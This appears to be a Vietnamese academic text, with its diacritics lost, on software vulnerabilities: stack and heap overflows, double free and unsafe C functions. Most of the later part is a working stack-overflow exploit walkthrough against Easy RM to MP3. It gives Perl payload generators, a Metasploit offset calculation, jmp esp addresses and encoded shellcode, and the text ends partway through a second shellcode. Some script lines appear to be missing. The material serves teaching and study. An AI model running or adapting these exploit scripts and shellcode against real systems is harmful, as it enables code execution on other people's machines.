Hnh 2.11: ESP s gim mt s bytes c khng gian cho bin

Disassembly[6] ca hm ging nh sau:
00401290 /$ 55
PUSH EBP
00401291 |. 89E5
MOV EBP,ESP
00401293 |. 81EC 98000000 SUB ESP,98

00401299 |. 8B45 08
MOV EAX,DWORD PTR SS:[EBP+8]
0040129C |. 894424 04
;|
MOV DWORD PTR SS:[ESP+4],EAX
;|
004012A0 |. 8D85 78FFFFFF LEA EAX,DWORD PTR SS:[EBP-88]

004012A6 |. 890424
MOV DWORD PTR SS:[ESP],EAX
004012A9 |. E8 72050000
CALL
004012AE |. C9
LEAVE
004012AF \. C3
RETN
;|
;|
; \strcpy
C th thy r chc nng prolog: PUSH EBP v MOV EBP,ESP. Tip theo bn s thy cp pht khong
trng cho bin Myvar: SUB ESP,98. V bn s thy mt s hm MOV v LEA ( c bn l thit lp cc
tham s cho li gi hm strcpy). C th gii thch l: t con tr v argv[1] ( chnh l EBP+8 sao
chp n vo EAX), sau sao chp EAX vo bin Myvar ( c v tr l ESP+4).
C th nh sau:
PUSH EBP: Tin hnh lu EBP ri MOV EBP,ESP: ESP v EBP cng tr ti nh stack, l EBP va c
push vo.
SUB ESP,98: Tin hnh cp pht mt khong nh l 152bytes ( 98 hexa to decima).
MOV EAX,DWORD PTR SS:[EBP+8] : EBP cng 8 chnh l ptr to argv[1]. Bc ny sao chp a ch tr
ti argv[1] vo EAX. Lu rng a ch c di bng 1 thanh ghi 32bit tc 4bytes.
MOV DWORD PTR SS:[ESP+4],EAX: Sao chp EAX ( tc a ch argv[1] ti ESP cng 4. Nh rng sau
khi SUB ESP,98, ESP c gim i, nh stack ( nh hnh trn) ch khng cn cng tr vo EBP na.
ESP cng 4 l t nh gim xung 4 ( stack pht trin t cao xung thp). Lc ny, 4bytes trn nh
stack cha a ch argv[1].
LEA EAX,DWORD PTR SS:[EBP-88] : Lnh ny s lu a ch nh EBP tr 88 vo EAX:
MOV DWORD PTR SS:[ESP],EAX: a ch ny sau c ghi vo ESP. ESP lc ny tr vo EBP tr 88,
tc bt u ca ni strcpy() lu gi tr ca argv[1].
Hnh 2.12: Stack sau khi thc hin lnh MOV

CALL
; \strcpy
Sau khi thc hin xong, tin hnh LEAVE ly li EBP lu, RET ly li EIP lu, chuyn v hm
main.
Nu nh khng c hm strcpy() trong hm ny, hm s kt thc v bung ra stack. C bn l, n s
di chuyn ESP li ESP lu, sau thc hin lnh RET. RET trong trng hp ny s ly con tr ESP
t stack v nhy n . Sau , n s quay li tr li chng trnh chnh, ni m hm
do_something() c gi. Hng dn epilog c thc hin bi lnh LEAVE, m s hi phc
framepointer v EIP. Trong v d ca chng ta, c hm strcpy()
Hm ny s c d liu, t a ch tr bi [Buffer], v lu tr n (trong s trn), c tt c d liu
cho ti khi gp null byte (string terminator k t kt thc). Trong khi sao chp d liu, ESP ni n
tr ti. Strcpy() khng s dng PUSH a d liu vo stack, n s c 1 bytes v a vo stack, s
dng index ch lnh ( nh ESP, ESP+1, ESP+2). Sau khi copy, ESP tr v u chui.
Hnh 2.13: ESP tr v u chui

C ngha l, nu [buffer] ln hn 0x98bytes, strcpy() s ghi EBP c lu v c EIP. Sau , n ch
c v ghi cho n khi gp c null byte trong chui ngun
.
Hnh 2.14: strcpy() s ghi EBP c lu v c EIP

ESP vn tr vo im bt u chui. Hm strcpy() kt thc nu khng c g sai, sau khi strcpy(), hm
kt thc ( do_something()). V y l mi th tr nn th v. Chc nng epilog c kch hot. C
bn, n s di chuyn ESP v ni EIP c lu, ri tin hnh RET. N s ly con tr (AAAA hoc
041414141 ty trng hp) v nhy n a ch .
V vy, bn kim sot c EIP. Bng cch iu khin EIP, bn thay i a ch tr v ( return address)
chng trnh tip tc bnh thng.
ng nhin, bn c th thay i a ch tr v bng cch tn dng buffer overflow.
V vy, gi s bn c th ghi buffer trong Myvar, EBP, EIP v bn c mt on code ca ring bn,
vng trc v sau khi EIP c lu. Sau khi ghi , EIP s tr v on code ca bn. V bn lm
cho EIP tr ti on code ca bn, v bn nm quyn iu khin
2.3.
LI TRN B M TRN HEAP
Heap c s dng cho vic cp pht b nh ng. Trong ngn ng lp trnh C [7]th vic cp pht v
gii phng c thc hin qua hai hm malloc() v free(). Khi chng trnh c np trong b nh th
phn on heap s nm trc phn on stack[8].
Bi v Heap c s dng lu tr d liu, khng c s dng lu cc gi tr a ch tr v ca
hm nh l Stack nn vic khai thc li trn b m trn Heap kh khn hn nhiu so vi vic khai
thc li trn b m trn Stack
Tuy nhin vn c th khai thc thnh cng li trn b m trn heap bng hai cch sau:
Sa d liu: K tn cng c th khai thc l hng bng cch ghi d liu quan trng. iu ny c
th l sp chng trnh hoc lm thay i gi tr c th c khai thc sau ny (nh ghi ln mt
ID ngi dng gn thm quyn truy cp).
Sa i tng: Trong nhiu ngn ng lp trnh nh C++ v Objective-C, cc i tng c t trn
Heap bao gm cc bng con tr hm v d liu. Do k tn cng c kh nng thay th d liu khc
hay thm ch thay th c cc instance methods[9] trong lp i tng
2.4.
LI DOUBLE FREE
Li ny xy ra khi hm free()[10] c gi nhiu hn 1 ln vi cng mt a ch b nh (a ch b nh

ny c chuyn vo hm free() nh mt i s). iu ny c th dn ti li trn b m do cu trc
qun l d liu b nh s b hng. V v th chng trnh c th b sp , hoc trong mt s trng
hp, hai hm malloc()[11] sau c s dng sau s tr v cng mt gi tr. iu ny dn ti vic k
tn cng s kim sot d liu c ghi trong gp i phn b nh c cp pht
Kt lun chng II
Chng II trnh by khi nim li phn mm v li bo mt phn mm.Trong chng ny chng ta
i tm hiu mt s li bo mt phn mm ph bin l: Li trn b m trn stack, Li trn b m
trn heap, Li double free.
Chng ta tp chung ch yu vo vic phn tch li trn b m trn stack, y l li ph bin nht v
cng d khai thc nht hin nay. iu quan trng nht trong li ny l vic ghi c ln EIP t
c th iu khin c lung d liu, l vic tr ti on m ca chng ta cn
thc thi.Sang chng tip theo chng ta s i nghin cu cch tm ra li v cc bc khai thc li
ny.
CHNG III. CC K THUT TM

LI V CC BC KHAI THC
LI BO MT PHN MM
1.1.
2.1.
3.1.
TM V PHT HIN LI
3.1.1. Vai tr l lp trnh vin

Vi lp trnh vin vic tm li ph thuc ln vo kinh nghim lp trnh ca h. H tm li ch yu bng
vic kim tra m ngun ca phn mm. Vi mt lp trnh vin c kinh nghim h tp trung vo cc
hm m c nguy c pht sinh li cao. Mt s hm m chng ta bit l : strcat, strcpy, strncat, strncpy,
sprintf, vsprintf, gets Hoc mt s cu trc c th gy li
Chng ta cng xem xt 3 hm: strcpy, strncpy, v strlcpy
Hnh 3.1: strcpy, strncpy, v strlcpy
Hm strcpy ghi chui vo b nh v n ghi ln bt k d liu g ng sau n. Nu chui m n ghi

vo ln hn b nh m n khai bo th phn d liu tha s c ghi ln phn b nh ngay sau .
iu ny gy ln li trn b m.
Vi hm strncpy s ch ghi d liu va ng vi b nh c cp, song n khng c k t kt thc
chui. iu ny dn ti vic khi chui ny c c th cc bytes d liu ng sau cng c th b c
ra.
Vi hm strlcpy th hon ton an ton bi n t ng thm vo k t kt thc ng sau.
Bng sau y s lit k cc hm tng t nh trn:
HM KHNG NN DNG
HM NN DNG
Strcat
Strlcat
Strcpy
Strlcpy
Strncat
Strlcat
Strncpy
Strlcpy
Sprintf
Snprintf hoc asprintf
Vsprintf
vsnprintf hoc vasprintf
Gets
fgets
Khi s dng mt s cu trc sau cng gy ln li trn b m

KHNG NN DNG
NN DNG
#define BUF_SIZE 1024
char buf[1024];
char buf[BUF_SIZE];
if (size <= 1023) {
if (size < BUF_SIZE) {
char buf[1024];
char buf[1024];
if (size < 1024) {
if (size < sizeof(buf)) {
Vic s dng hm sizeof() tnh ton kch thc ca b m s gip trnh c li hn khi m ch
trc tip. Nu kch thc ban u ca b m thay i th hm kim tra b m bn tri s khng
dng c v n s gy li nu s dng.
Mt ch na l vic s dng s nguyn c du.
0x7fffffff= 2147483647 Nhng
0x80000000 = -2147483648
iu ny s gy ra vic
int 2147483647 + 1 = 2147483648
3.1.2. Vai tr l ngi kim th
i vi nhng ngi kim th tm li phn mm h da vo test case. Test case l cc trng hp
c t ra i vi phn mm m ngi kim th c th th trc tip trn phn mm.
Ty thuc vo tng phn mm khc nhau m ngi kim th s dng cc test case khc nhau. Nhng
tng quan h u kim tra bng cch nhp vo u vo ca phn mm cc gi tr khc nhau v nh
gi cc kt qu nhn c u ra. H xem cc kt qu u ra c phi l kt qu mong mun hay
khng
Mt v d c th l vic tm li ca mt khung ng nhp vi u vo gm hai trng l tn ng nhp
v mt khu
Trong v d ny ngi kim th s phi truyn vo hai trng cc gi tr khc nhau v nhn li cc kt
qu. C th l :
STT
Tn ng nhp
Mt khu
Kt qu mong i
Tt c cc trng hp
Khng truyn gi tr no
ng nhp tht bi
Khng truyn gi tr no
Tt c cc trng hp
ng nhp tht bi
L s
Tt c cc trng hp
ng nhp tht bi
C k t c bit
Tt c cc trng hp
ng nhp tht bi
C trong CSDL
Mt khu khp
ng nhp thnh cng
C trong CSDL
Mt khu khng khp
ng nhp tht bi
Khng c trong CSDL
Tt c cc trng hp
ng nhp tht bi
3.1.3. Vai tr l hacker
bit xem phn mm c b li hay khng, cc hacker thng th a d liu vo u vo ln. Nu

phn mm b li th thng bo li s xut hin, phn mm s b crash. Trong v d sau s minh ha
cch m cc hacker s dng pht hin li phn mm : V d minh ha s dng phn mm Easy RM
to MP3 ci t trn Windows XP. Cc bc xc nh li nh sau :
Bc 1 : u tin, cn xc nhn rng ng dng khng thc s crash sp khi m nh dng
m3u hoc ng dng b treo khi m d liu c bit specifically crafted data.
Chng ta s s dng mt on code perl[12] to ra file crash.m3u gip chng ta thu thp c
nhiu thng tin v l hng ny
my $file= crash.m3u;
my $junk= \x41 x 10000;
open($FILE,>$file);
print $FILE $junk;
close($FILE);
print m3u File Created successfully\n;
Chy on script ny s to file m3u, c lp y bi 10000 k t A (\x41 m m hexa ca A) v
m n bng phn m Easy RM to MP3. ng dng a ra mt thng bo li nh c v c x l chnh
xc v ng dng khng b crash:
Hnh 3.2: ng dng khng b crash

Bc 2: Th thay i script vi 20000 A v th li, vn nh vy ( ngoi l c x l chnh xc v
chng ta vn cha th ghi c nhng thng tin c ch chi tit pha sau). By gi th thay i
vi 30000 A v m bng phn mm:
Hnh 3.3: ng dng b crash

Vy l ng dng b crash nu file c 20000 n 30000 A. ng dng b li trn b m trn stack
Kt lun: R rng, khng phi tt c ng dng b crash u khai thc c. Trong nhiu trng
hp, mt ng dng b crash s khng dn n exploit. Nhng mt s li c th. Vi exploit, chng ta
s bt ng dng lm mt ci g m khng c nh lm, v d nh chy mt on code ca bn
chng hn. n gin nht lm ng dng lm g khc bng cch iu khin lung ca ng dng
application flow. iu c th c bng cch iu khin cc con tr hng dn Instruction
Pointer hoc Program Counter, l mt thanh ghi ca CPU cha con tr ch n lnh tip theo s c
thc hin.
Gi s ng dng gi mt hm vi mt tham s. Trc khi n hm , n s lu li v tr hin ti
( thng c bit n l a ch quay v khi hm kt thc). Nu bn c th thay i gi tr ca con
tr ny tr n n mt ch khc trong b nh m cha phn code ca bn, tip theo bn c th thay
i dng x l ca ng dng v lm cho n thc thi mt ci g khc ( thay v tr v v tr ban u).
on code m bn mun c thc thi sau khi iu khin c con tr thng c gi l shellcode.
V vy, nu chng ta lm cho ng dng chy shellcode ca chng ta, chng ta c th goi n l mt
exploit. Trong hu ht trng hp, con tr ny c tham chiu bi thanh ghi EIP. Thanh ghi c di
4 bytes. Cho nn nu bn c th thay i 4 bytes ny, bn s lm ch c ng dng v computer
chy ng dng .
3.2.
CC BC KHAI THC LI
Trong phn ny chng ta s ch yu tm hiu cc bc khai thc li trn b m trn stack. Thng
thng c 5 bc thc hin vic khai thc l hng bo mt phn mm ny. Sau y l chi tit tng
bc
3.2.1. Mc chng trnh ti debugger[13]
thy c trng thi ca stack ( v gi tr ca thanh ghi, nh con tr stack, con tr lnh..) chng
ta cn phi mc mt debugger ti ng dng, chng ta c th thy nhng g xy ra trong thi gian ng
dng chy ( v c bit khi n cht). C nhiu trnh debug cho mc ch ny, trong l Windbg, v
Immunitys Debugger.
By gi chng ta s bt u vi v d phn tm li trn b m trn stack:
Chy Easy RM to MP3 v m file crash.m3u mt ln na. ng dng s sp mt ln na. Lc ny
ng dng debugger s chy.
Hnh 3.4: Giao din ca Windbg
Hnh 3.5: Giao din ca Immunity

Hai giao din ny cho thng tin gn ging nhau, ch khc nhau cch th hin. Vi giao din va phn
mm Immunity tri trn, bn c th thy CPU view, hiu th assembly code. Ca s trng v EIP hin
ti tr ti 41414141 l mt a ch sai ( AAAA). Bn phi trn, bn s thy cc thanh ghi. Phi di l
ni dung ca stack.
V vy, trng n nh mt phn ca file m3u c c vo buffer v gy nn buffer overflow. Chng ta
gy nn trn b nh m v ghi ln trong tr lnh. V vy chng ta c th kim sot thanh ghi
EIP
File ca chng ta ch cha A, chnh v vy chng ta khng bit chnh xc ln ca buffer ghi
chnh xc ln EIP. Ni cch khc, nu chng ta mun ghi ln EIP ( lm cho n nhy n on m
ca chng ta) chng ta phi bit chnh xc v tr trong buffer/payload s ghi a ch tr v. V tr
ny thng c gi l offset
3.2.2. xc nh chnh xc EIP trong b m

Mc ch bc ny l xc nh chnh xc v tr m EIP c lu trong stack. Chng ta tip tc phn tch
v d trn lm r cch thc thc hin bc ny
Chng ta bit c rng EIP nm v tr no gia 20000 v 30000bytes ca buffer. By gi, bn c

kh nng ghi tt c khng gian b nh gia 20000 v 30000 bytes vi a ch bn mun ghi EIP.
iu ny c th lm c, nhng s tt hn nu bn tm c chnh xc v tr ghi . xc nh
v tr chnh xc ca offset EIP trong buffer, chng ta cn lm thm mt s vic b sung:
u tin, chng ta s thu hp khong bng cch thay i ni dung file perl. Chng ta s to ra 1 file
25000A v 5000B. Nu EIP cha 41414141, EIP s nm gia 20000 v 25000. Cn nu EIP cha
42424242, EIP gia 25000 v 30000.
my $file= crash25000.m3u;
my $junk = \x41 x 25000;
my $junk2 = \x42 x 5000;
open($FILE,>$file);
print $FILE $junk.$junk2;
close($FILE);
To file v m file: crash25000.m3u bng Easy RM to MP3
Hnh 3.6: EIP cha 42424242 (BBBB)

EIP cha 42424242 (BBBB) nn chng ta bit rng EIP nm gia 25000 v 30000.
Hnh 3.7: Ni dung ca Buffer sau khi thc Easy RM to MP3 chy
Hnh 3.8: ni dung ESP

Chng ra ghi c EIP vi BBBB v c th thy c buffer trong ESP
Chng ra cn tm chnh xc v tr trong buffer ghi EIP. lm c vic , chng ra s dng
Metasploit
Metasploit l cng c tt gip tnh ton offset. N s to tra nhng string cha nhng mu duy
nht. S dng mu ny, cng vi gi tr EIP sau khi s dng mu ny trong file m3u) chng ta thy
c b m d ln s c c ghi EIP nh th no.
M th mc tool trong metasploit framework3. Bn s tm thy mt script lpattern_create.rb. To
mt mu vi 5000 k t v ghi n ra file.
root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 5000
Thay i perl script ca chng ta v thay i $junk2 bng 5000 k t ca chng ta:
my $file= crash25000.m3u;
my $junk = \x41 x 25000;
my $junk2 = put the 5000 characters here
open($FILE,>$file);
close($FILE);
To file .m3u, v m bng Easy RM to MP3. i cho ng dng cht v ch n ni dung ca EIP:
Hnh 3.9: Ni dung ca EIP sau khi ng dng sp

Trong ln ny, EIP cha gi tr 0x356b4234
Chng ta s s dng cng c th hai ca metasploit ngay by gi. tnh ton di chnh xc ca
buffer trc khi ghi vo EIP, cn gia v tr EIP v di buffer:
root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb 0x356b4234 5000
1094
Ta thy kt qu cu lnh ra 1094, l di buffer cn ghi EIP. Cho nn, nu bn to mt file
vi 25000+1094 A, theo sau l 4 B (42424242) EIP s cha 42424242. Chng ta bit rng EIP ch n
mt im d liu trong buffer, nn chng ta s thm mt s C sau khi ghi EIP.
Chng ta s thay i file m3u to file m3u mi:
my $file= eipcrash.m3u;
my $junk= A x 26094;
my $eip = BBBB;
my $espdata = C x 1000;
open($FILE,>$file);
print $FILE $junk.$eip.$espdata;
close($FILE);
To file eipcrash.m3u, m n bng Easy RM to MP3, v ch ti ni dung ESP:
Hnh 3.10: EIP mang gi tr BBBB
Hnh 3.11: ESP lu a ch 000ff730

By gi EIP cha BBBB, chnh xc l iu m chng ta cn. By gi chng ta s iu khin EIP.
Trn nh ca n, ESP tr n buffer ca chng ta (C)
Expliot buffer ca chng ta s trng nh th ny:
Hnh 3.12: Ni dung ca Expliot buffer

3.2.3. Tm khng gian b nh lu tr cc shellcode
Chng ta iu khin c EIP, gi chng ta s chi ti mt ch no , ni cha code ca chng ta (
shellcode). Nhng trong khong trng ny, lm th no chng ta c th t shellcode ti v tr v
lm cho EIP nhy n ? Tip tc phn tch v d trn lm sng t vn ny.
lm crash (sp ) ng dng, chng ta ghi 26094 A vo b nh, chng ta chi mt gi tr mi
vo EIP, ghi mt lot C.
Khi ng dng b crash (sp ), ch n cc thanh ghi v dump (ch ra) chng (s dng lnh: d esp,
d eax, d ebx) bn s thy buffer ca chng ta ( ch gm c A v C), gi bn c th thay th chng
bng shell code v nhy ti v tr . Trong v d ca chng ta, c th thy ESP tr n C ( s dng d
esp xem), do tng l t shellcode vo phn C v yu cu EIP tr n .
Mc d thc t l cho d ta thy C nhng khng bit c phi l C ( ti a ch 000ff730) u tin
khng. Trong thc t, C u tin c t vo trong buffer
Chng ta li thay i perl script vi chui k t mu sau. y s dng 144 k t (c th dng nhiu
hoc t hn) thay th C.
my $file= test1.m3u;
my $eip = BBBB;
my $shellcode = 1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK .
5ABCDEFGHIJK6ABCDEFGHIJK .
9ABCDEFGHIJKAABCDEFGHIJK.
BABCDEFGHIJKCABCDEFGHIJK;
open($FILE,>$file);
print $FILE $junk.$eip.$shellcode;
close($FILE);
To file v m, quan st ESP:
Hnh 3.13: ESP bt u t k t th 5

Bn s thy c 2 iu th v sau:
ESP bt u t k t th 5 trong mu ca chng ta, ch khng phi k t u tin
Kt thc chui mu bn thy A, nhng A ny thuc v phn u ca mu (26101 A) , do
bn c th t shellcode vo phn u ca mu.

Chng ta s thm 4 k t trc mu v kim tra li mt ln na. ESP s tr vo k t u tin ca
mu:
my $eip = BBBB;
my $preshellcode = XXXX;
my $shellcode = 1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK .
9ABCDEFGHIJKAABCDEFGHIJK.
BABCDEFGHIJKCABCDEFGHIJK;
open($FILE,>$file);
print $FILE $junk.$eip.$preshellcode.$shellcode;
close($FILE);
ng dng li crash v quan st ESP ln na:
Hnh 3.14: ESP tr vo k t u tin ca chui mu

By gi chng ta c:
Kim sot c EIP
Mt vng m chng ta c th t shellcode (144bytes). Thc t n ln hn, ln hn rt nhiu.
Thanh ghi tr trc tip vo code ca chng ta, ti a ch 0x000ff730
Chng ta cn:
Mt shellcode thc s
Ni vi EIP tr n a ch bt u shellcode. C th lm vy bng cch ghi EIP vi a ch
0x000ff730
By gi chng ta s lm trng hp n gin. Ghi EIP vi 000ff730, ri 25NOP[14] (\x90), ri
break (/xcc), ri 25NOP. Nu thnh cng, EIP s nhy n 0x000ff730, chy NOP cho n khi gp
break.
my $eip = pack(V,0x000ff730);
my $shellcode = \x90 x 25;
$shellcode = $shellcode.\xcc;
$shellcode = $shellcode.\x90 x 25;
open($FILE,>$file);
close($FILE);
ng dng sp . Khi nhn vo EIP, tr n 0x000ff730. Khi dump ESP, chng ta khng nhn thy ci
chng ta mong i.
Hnh 3.15: eip cha ni dung l 000ff730

Nhy n mt a ch trc tip khng phi l mt phng php tt (000ff730 cha null byte string
terminator). Bn cnh , vic s dng mt a ch nh jump (nhy) l khng ng tin cy, n
ph thuc vo h iu hnh, ngn ng. Vy lm th no nhy ti shellcode mt cch tin cy? iu
ny c trnh by bc tip theo.
3.2.4. Nhy n shellcode mt cch tin cy
Chng ta t buffer chnh xc ti im ESP tr vo. Ni cch khc, ESP tr vo im bt u
shellcode. Nu trng hp khng xy ra, chng ta cn tin hnh xem xt ni dung cc con tr
khc, v hy vng tm thy buffer. Trong v d ny, chng ta s dng ESP.
Jumming to ESP l k thut rt ph bin trong ng dng windows. Thc t ng dng windows s dng
mt hoc nhiu file dll, v cc dll ny cha rt nhiu m lnh. Hn na, a ch s dng bi dll l a
ch tnh. Cho nn nu tm c dll cha m lnh nhy n esp, chng ta c th ghi a ch EIP bng
a ch lnh .
Trc tin, chng ta cn tm nhng opcode[15] cho jmp esp
Bn c th lm vic bng cch m Easy RM to MP3, ri m windbg, v hook (mc) windbg ti Easy
RM to MP3. Khng lm bt k iu g vi Easy RM to MP3. iu ny gip windbg cho ta thy Easy RM
to MP3 np nhng module , nhng dll no.
Hnh 3.16: Mc windbg vi Easy RM to MP3

Khi gn vo debugger, ng dng s b break
Trong windbg command line, nhp a (assemble) v enter
Tip theo nhp jmp esp v enter
Tip theo nhp u (unassemble) ri n a ch hin th lc trc khi nhp jmp esp
Hnh 3.17: ffe4 l opcode ca jmp esp

n 7c90120e, bn c th thy ff e4. l opcode ca jmp esp. By gi chng ta s tm opcode trong
nhng dll c load.
ModLoad: 774e0000 7761d000
C:\WINDOWS\system32\ole32.dll
ModLoad: 10000000 10071000
C:\Program Files\Easy RM to MP3
Converter\MSRMfilter03.dll
ModLoad: 71ab0000 71ac7000
C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000
C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 00ce0000 00d7f000
Converter\MSRMfilter01.dll
ModLoad: 01a90000 01b01000
Converter\MSRMCcodec00.dll
ModLoad: 00c80000 00c87000
ModLoad: 01b10000 01fdd000
ModLoad: 01fe0000 01ff1000
ModLoad: 77120000 771ab000
C:\WINDOWS\system32\MSVCIRT.dll
C:\WINDOWS\system32\OLEAUT32.dll
Nu chng ta tm c mt opcode trong dll, y l c hi tt khai thc trn windows. Nu chng

ta tm trong mt dll thuc v h iu hnh, chng ta s thy rng ch c th lm vic vi phin bn h
iu hnh . Do chng ta s lm vic vi Easy RM to MP3 dll trc tin:
Chng ta xem xt C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll . Dll c load gia
01b10000 v 01fd000. Tin hnh tm kim ff e4
Khi la chn 1 a ch, hy ch ti NULL BYTE. Bn nn trnh s dng null byte. Byte ny s kt
thc chui v phn sau d liu khng th s dng c.
Mt cch khc tm kim opcode l:
s 70000000 l fffffff ff e4
C mt s cch tm a ch opcode
Findjmp (Ryan Permeh): complite findjmp.c v chy vi cc tham s.
Metasploit opcode database
Memdump
Pvefindaddr, mt plugin ca Immunity Debugger
Bi v chng ta mun t shellcode trong ESP ( sau ny EIP ch ti ), a ch jmp esp khng c
c null byte. a ch u tin s c ly: 0x01ccf23a
Kim tra a ch cha jmp esp:
Hnh 3.18: Opcode ca jmp esp trong file dll

Nu bn ghi EIP vi 0x01ccf23a, jmp esp s c thc thi. ESP cha shellcode, v vy chng ta s
c mt cch khai thc. Th nghim vi on code NOP break
ng windbg li. To mt file m3u bng on script sau:
my $eip = pack(V,0x01ccf23a);
$shellcode = $shellcode.\xcc;
$shellcode = $shellcode.\x90 x 25;
open($FILE,>$file);

close($FILE);
Kt qu thu c:
Hnh 3.19: Kt qu thu c khi th nghim vi on NOP break

Chy ng dng mt ln na, attack windbg, bm g tip tc, v m file m3u bng ng dng.
ng dng break ti 000ff745, c ngha jmp esp lm vic tt ( bt u 000ff730, nhng n cha NOP
nn chy ti 000ff744). Tt c vic cn lm by gi l t vo mt shellcode thc s.
C rt nhiu k thut nhy ti shellcode c gii thiu k hn phn 3.3. Vic s dng k thut
no l ph thuc vo tng trng hp c th
3.2.5. Ly shellcode hon thin exploit
y l bc cui cng hon thin qu trnh khai thc. Vic cui cng l chn la shellcode ph hp.
Metasploit cung cp nhiu payload[16] cho chng ta xy dng exploit. Payloads c cc ty chn khc
nhau, ty thuc vo nhng g chng ta cn, c th rt nh hoc rt ln. Nu b nh buffer c gii hn,
bn c th s dng multi-staged shellcode. Hoc s dng shellcode th cng
(32byte cmd.exe shellcode for xp sp2 en). Ngoi ra, bn c th chia nh shellcode lm cc phn gi l
eggs, sau s dng k thut egg-hunting reassemble lp rp shellcode.
Perl script s l:
my $file= exploitrmtomp3.m3u;
# windows/exec 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode .
\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1 .
\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30 .
\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa .
\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96 .
\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b .
\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a .
\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83 .
\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98 .
\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61 .
\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05 .
\x7f\xe8\x7b\xca;
open($FILE,>$file);
close($FILE);
u tin, tt autopopup trong registry. To file m3u v m bng ng dng:
Chng ta c exploit u tin.
Hnh 3.20: Khai thc thnh cng

3.3.
CC K THUT NHY TI SHELLCODE
Vic nhy ti shellcode l vic quan trng nht trong qu trnh khai thc li phn mm. N l yu t
quyt nh n s thnh cng ca vic khai thc li bo mt phn mm. C rt nhiu cch nhy ti
shellcode, ty tng trng hp c th m la chn cch thc hin hp l. Trong phn ny chng ta s
i tm hiu tng cch thc nhy ti shellcode mt
3.3.1. jump (hoc call)
Jump ( hoc call) thanh ghi tr trc tip n shellcode. Vi k thut ny, c bn l bn s s dng mt
thanh ghi c cha a ch tr ti ni cha shellcode v t a ch ny vo trong EIP. Bn s c gng
tm opcode ca jump hoc call ti thanh ghi c trong cc dll file ca ng dng ang chy. Khi bn
to ra payload, thay v ghi EIP ti mt a ch trong b nh, bn s ghi a ch cha lnh jum to
register. ng nhin, phng php ny ch hot ng tt khi m thanh ghi cha a ch tr ti
shellcode. y l cch m chng ta s dng trong phn trn.
Nu mt thanh ghi cha mt a ch tr trc tip ti shellcode, bn c th s dng call [reg] hoc
jump trc tip n shellcode. Ni cch khc, nu ESP tr trc tip vo shellcode ( nn bytes u tin
ca shellcode l bytes u tin ca ESP) bn c th ghi EIP vi a ch cha lnh call esp, v
shellcode s c thc thi. iu ny lm vic vi tt c thanh ghi v th vin kernel32.dll cha rt
nhiu a ch cha call [reg].
V d : gi s ESP tr trc tip n shellcode, u tin hy tm mt opcode c cha call esp. Chng
ta s s dng findjmp:
findjmp.exe kernel32.dll esp
Findjmp, Eeye, I2S-LaB

Findjmp2, Hat-Squad
Scanning kernel32.dll for code useable with the esp register
0x7C836A08
call esp
0x7C874413
jmp esp
Finished Scanning kernel32.dll for code useable with the esp register
Found 2 usable addresses
Tip theo, chng ta s ghi EIP vi a ch 0x7C836A08.
Trong v d trc, vi Easy RM to MP3, chng ta bit rng c th tr ESP ti shellcode bng cch thm
4 k t gia EIP v ESP, exploit s nh sau:
my $eip = pack(V,0x7C836A08);
my $prependesp = XXXX;

# Encoder: x86/alpha_upper
$shellcode = $shellcode . \x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49 .

\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56 .
\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41 .
\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42 .
\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a .
\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47 .
\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c .
\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a .
\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50 .
\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43 .
\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a .
\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c .
\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44 .
\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c .
\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47 .
\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50 .
\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44 .
\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43 .
\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42 .
\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b .
